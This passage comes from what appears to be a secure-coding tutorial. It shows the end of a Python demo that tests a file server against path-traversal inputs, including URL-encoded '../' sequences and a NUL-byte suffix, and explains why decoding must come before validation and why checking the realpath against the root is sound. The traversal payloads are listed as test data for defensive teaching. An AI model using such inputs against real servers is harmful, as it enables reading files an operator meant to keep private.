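        results = {"motd.txt": serve_file(root, "motd.txt")}
        # the naive version happily follows an encoded ../ out of the tree
        with open(naive_resolve(root, "..%2Fsecret"), "rb") as fh:
            results["naive ..%2Fsecret"] = fh.read()
        for payload in ("..%2Fsecret", "/../secret", "%2e%2e/secret", "motd.txt%00.gif"):
            try:
                serve_file(root, payload)
                results[payload] = "served"
            except ValueError:
                results[payload] = "rejected"
        return results
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-22s %r" % (key, value))
```

Note the order of checks: decode first, then look for NUL and traversal, because a filter that runs before decoding misses %2e%2e and %00 entirely. Checking the realpath against the root, rather than searching the string for "..", also covers symlinks that point outside the tree.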